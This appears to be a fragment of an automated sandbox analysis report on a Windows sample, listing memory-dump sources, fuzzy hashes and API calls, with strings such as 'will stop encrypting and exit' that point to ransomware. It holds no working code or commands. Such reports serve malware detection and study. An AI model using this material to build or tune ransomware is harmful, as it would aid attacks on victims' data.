                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e79707032ea11b7e05dd2284fb1703ee3417870bf6907e449d73e088435f8fb0
                                                                    • Instruction ID: de22d99d4b4ed9cedbad6e7301ed9d40734f4557ba9a88e600b9cb0fc7be9ef8
                                                                    • Opcode Fuzzy Hash: e79707032ea11b7e05dd2284fb1703ee3417870bf6907e449d73e088435f8fb0
                                                                    • Instruction Fuzzy Hash: D9F13B71E012199BDF14CFA8D9806EEBBF1FF89314F15826DD919BB344D731AA018B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,00EA6F4D,?,will stop encrypting and exit ,will stop encrypting and exit ,?,00EA6F82,?,00000000,00F2C0CC,will stop encrypting and exit ,will stop encrypting and exit ,?,00EA5CD0,00F2C0CC,00000001), ref: 00EA72A3
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,00EA6F4D,?,will stop encrypting and exit ,will stop encrypting and exit ,?,00EA6F82,?,00000000,00F2C0CC,will stop encrypting and exit ,will stop encrypting and exit ,?,00EA5CD0), ref: 00EA72A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Time$FileSystem$Precise
                                                                    • String ID:
                                                                    • API String ID: 743729956-0
                                                                    • Opcode ID: 312da05f833b84d91f309b83e116c24945bf3f0e1a97967ec89bcca3aa0f0769
                                                                    • Instruction ID: 485cb0b5fc3611bf0bfd53a9f1c1ddd2bab64feb2921981d319ecc58e328bf00
                                                                    • Opcode Fuzzy Hash: 312da05f833b84d91f309b83e116c24945bf3f0e1a97967ec89bcca3aa0f0769
                                                                    • Instruction Fuzzy Hash: B3D0A732508128DB8A011B95BC0499DBB18EB0EB313040031F84566130C713A80257D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P
                                                                    • API String ID: 0-1343716551
                                                                    • Opcode ID: 1ab8aab0c87f51d55c736b1b6def9fdaad20e9c0672ba981b11462dea9d2b9e8
                                                                    • Instruction ID: 63cb58f98cb8d15b7e47b92858ecbb7cd28703502cb2e12323cf8b068123e67d
                                                                    • Opcode Fuzzy Hash: 1ab8aab0c87f51d55c736b1b6def9fdaad20e9c0672ba981b11462dea9d2b9e8
                                                                    • Instruction Fuzzy Hash: AEA25F30A250688FC748DF5EFC9187AB3B1F759302785451BE642EB3A5CB38E629DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EBB034,?,?,00000008,?,?,00EC31B5,00000000), ref: 00EBB266
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 8967ef500f6628ba4a9771638bbfde7867a86ac9534144e5dd191d68ef921145
                                                                    • Instruction ID: b60064a406cf2d8aabf1aa13efbea36cda27474894db00328b2dd630201b629f
                                                                    • Opcode Fuzzy Hash: 8967ef500f6628ba4a9771638bbfde7867a86ac9534144e5dd191d68ef921145
                                                                    • Instruction Fuzzy Hash: D3B13B31610608DFD719CF2CC496BAA7BE0FF45368F259658E899DF2A1C375E982CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB555B
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB5591
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EBFC54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast_free$InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2003897158-0
                                                                    • Opcode ID: 464fa78e8b60659c81c3412a53c35cffe0956fc6bcd789f664ae06eeb08cf50f
                                                                    • Instruction ID: fa4c4e6a378d02fd4783ec9e3f825363b1bcbe9afc49721c4cd5e1db5ed65c88
                                                                    • Opcode Fuzzy Hash: 464fa78e8b60659c81c3412a53c35cffe0956fc6bcd789f664ae06eeb08cf50f
                                                                    • Instruction Fuzzy Hash: 9F21C83250424AABDB189F29DC81AFBB7E8EF44315B10607AFD05E6142EB34ED848B54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                    • EnumSystemLocalesW.KERNEL32(00EBF9A0,00000001,00000000,?,-00000050,?,00EBFFDB,00000000,?,?,?,00000055,?), ref: 00EBF8E4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2417226690-0
                                                                    • Opcode ID: 95401eba5847f0391acc0d9b1349943e39310b4119896e86c7c910359063cd0e
                                                                    • Instruction ID: 7294288d7459e3409bd6a5f1c310f3c672c1b5c63eaaba5d7d55a3976e60c095
                                                                    • Opcode Fuzzy Hash: 95401eba5847f0391acc0d9b1349943e39310b4119896e86c7c910359063cd0e
                                                                    • Instruction Fuzzy Hash: 2F11C23A2007059FDB1C9F79CC916BBBB91FF84359B18443DE987A7A40D371A942CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00EBFBBC,00000000,00000000,?), ref: 00EBFE58
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 3736152602-0
                                                                    • Opcode ID: 06402e86a454007f4b726cee113463b89329a93aba05edc6d1fe00997ee413f5
                                                                    • Instruction ID: f2d777b160b96a7efbdbf454531c9fccbe2e4a26535e3b81bf458663169c2713
                                                                    • Opcode Fuzzy Hash: 06402e86a454007f4b726cee113463b89329a93aba05edc6d1fe00997ee413f5
                                                                    • Instruction Fuzzy Hash: 9AF0A432A10111BFDB286A65CC05BFB77A8EB40768F158439ED16B3191EA75FE41C6A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB555B
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB5591
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EBF7D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast_free$InfoLocale
                                                                    • String ID: utf8
                                                                    • API String ID: 2003897158-905460609
                                                                    • Opcode ID: 7e736acaf5bfc1f11b3b8f47761774a3d25d1adeaf505a7827c5d613e48ad313
                                                                    • Instruction ID: 5b962199c371f1ed8244c7f4c3d274175121a7a9e29e642e4e6740e51f205354
                                                                    • Opcode Fuzzy Hash: 7e736acaf5bfc1f11b3b8f47761774a3d25d1adeaf505a7827c5d613e48ad313
                                                                    • Instruction Fuzzy Hash: CBF02832A00205ABC714AB38EC45EFB33ECDB48311F0051BAF606F7281EE34AD058750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                    • EnumSystemLocalesW.KERNEL32(00EBFC00,00000001,?,?,-00000050,?,00EBFF9F,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00EBF957
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2417226690-0
                                                                    • Opcode ID: 8008d7742fb48263e03177a17c637e76e8792c9cfc79579c27909126f8c47a7c
                                                                    • Instruction ID: 272dae63979ad0445e5ab7e00be4c2c120f1e9f87b791b4b27476301090c9f72
                                                                    • Opcode Fuzzy Hash: 8008d7742fb48263e03177a17c637e76e8792c9cfc79579c27909126f8c47a7c
                                                                    • Instruction Fuzzy Hash: 7AF0C2362003046FDB245FB99C81BABBB91EB8076CF15443DFA46AB690C6719C42CA50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB1951: EnterCriticalSection.KERNEL32(-00F2B7CF,?,00EB2A9A,00000000,00EED3B8,0000000C,00EB2A61,00E64835,?,00EB591B,00E64835,?,00EB569B,00000001,00000364,00000006), ref: 00EB1960
                                                                    • EnumSystemLocalesW.KERNEL32(00EB5980,00000001,00EED4F8,0000000C,00EB5DCC,00000000), ref: 00EB59C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                    • String ID:
                                                                    • API String ID: 1272433827-0
                                                                    • Opcode ID: 7ae270abe80868e29a152288704f6ac98e067a54572d1b422ecb057ffee7c3de
                                                                    • Instruction ID: 3b4f1047f569730f7ac396e340c873320b017b511ea4cba27b09b25bc78805cd
                                                                    • Opcode Fuzzy Hash: 7ae270abe80868e29a152288704f6ac98e067a54572d1b422ecb057ffee7c3de
                                                                    • Instruction Fuzzy Hash: BAF04972A44308DFE700EFA8E842B9D77F0EB48731F10526AF420EB2A0CB7599419B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                    • EnumSystemLocalesW.KERNEL32(00EBF780,00000001,?,?,?,00EBFFFD,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EBF85E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2417226690-0
                                                                    • Opcode ID: f8894da3f99b8efc96b963e6f5dde15da65b5814cf850fd70581d6225af76701
                                                                    • Instruction ID: 2911561ab70a164384aaa8eeef6d9fe6844ea2d8a92f9a848b27f5d0b35811f4
                                                                    • Opcode Fuzzy Hash: f8894da3f99b8efc96b963e6f5dde15da65b5814cf850fd70581d6225af76701
                                                                    • Instruction Fuzzy Hash: 67F0E53A30020557CB199F7ADC55AAB7F95EFC1715B0A4069EA099B250C6729843C790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00EB4CB1,?,20001004,00000000,00000002,?,?,00EB429C), ref: 00EB5F04
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: c8526a2655c0cf23eda1ecc1daf5144b70bb54b024b4cebf51c1c850fdad3295
                                                                    • Instruction ID: e23e1a153b25c6b746b13c20a965b9388d49ffb0e07458df7ae56199137a8ecb
                                                                    • Opcode Fuzzy Hash: c8526a2655c0cf23eda1ecc1daf5144b70bb54b024b4cebf51c1c850fdad3295
                                                                    • Instruction Fuzzy Hash: 0AE01A32504619BFCF122F61DC04FEF7A65BB44761F484020FC46751218B328921AAD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 6ab59acf56cc6c85d11e7b606c8ecb0dcd56ab9c8ad266a151be713356baf821
                                                                    • Instruction ID: 24223a6c7a311e09688b4d7a312bcf16ffe8f88704f6230f46da5364e87c88da
                                                                    • Opcode Fuzzy Hash: 6ab59acf56cc6c85d11e7b606c8ecb0dcd56ab9c8ad266a151be713356baf821
                                                                    • Instruction Fuzzy Hash: CC512474A0C6485ADF389A288C957FF679A9B6F308F14B419E483FFE92C611BD44C212
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1f53ee494f9268378ed49b32ffaceaf61d24bba97540938e3691837556ab7efc
                                                                    • Instruction ID: afe237f4359a0908b49a4a901da85594262249d79f21371873ed816eb86b1ce6
                                                                    • Opcode Fuzzy Hash: 1f53ee494f9268378ed49b32ffaceaf61d24bba97540938e3691837556ab7efc
                                                                    • Instruction Fuzzy Hash: 78723B71E0021A8BDF14CFA8C9806ADB7F2BF84314F299279D815FB255EB74AD45CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e33878f5636489bdf713726aff58e1c8cdec8ccee26219b2a80ef8ee30919ace
                                                                    • Instruction ID: 7687c9d8643799735791068d019d3f834f955f37eb6996b1629c4f8b882f1612
                                                                    • Opcode Fuzzy Hash: e33878f5636489bdf713726aff58e1c8cdec8ccee26219b2a80ef8ee30919ace
                                                                    • Instruction Fuzzy Hash: 5C6253B0A0030A9BEF14CFA4C5947AEF7F1BF54308F245169D815BB286E7B59E49CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c10c512160f5016bd83994fff61ec3647b4ce0bc10dc91419dd971aeaaa87b8
                                                                    • Instruction ID: de0324e9661f1055283e60167e815f34dbc5c1c560323a567579e833369866d0
                                                                    • Opcode Fuzzy Hash: 8c10c512160f5016bd83994fff61ec3647b4ce0bc10dc91419dd971aeaaa87b8
                                                                    • Instruction Fuzzy Hash: 1762B071E402198FCB58CF9DC991ACCF7FAFF88308F19816AD419A7652D774AA818F40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4b54a0f3063c9c2c2d66cb66794a9da6955098a5a2f1b534ea4b68c5deaaa15b
                                                                    • Instruction ID: 8e777bbdd73801c482c0fc7e70d1c00811230963fb8276b13d3881c34de368f0
                                                                    • Opcode Fuzzy Hash: 4b54a0f3063c9c2c2d66cb66794a9da6955098a5a2f1b534ea4b68c5deaaa15b
                                                                    • Instruction Fuzzy Hash: 78722B65D29BC285E333873D94423E6E764BFEB285F40EB1EECD831D02EB3092459245
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6781ee781a980e4ae96a09a9eb3cd8de7e085624bae86c4563f68d53c2311d79
                                                                    • Instruction ID: 1f0acd85bbfc3603b823a2b7996b4a331cb152c12f5ffba5ca2ef0cd62ce100e
                                                                    • Opcode Fuzzy Hash: 6781ee781a980e4ae96a09a9eb3cd8de7e085624bae86c4563f68d53c2311d79
                                                                    • Instruction Fuzzy Hash: 1A2220B3F116144BCB48CE6DCC927DEB2E3BF94218B1E8539D805E7705E639E9154A84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
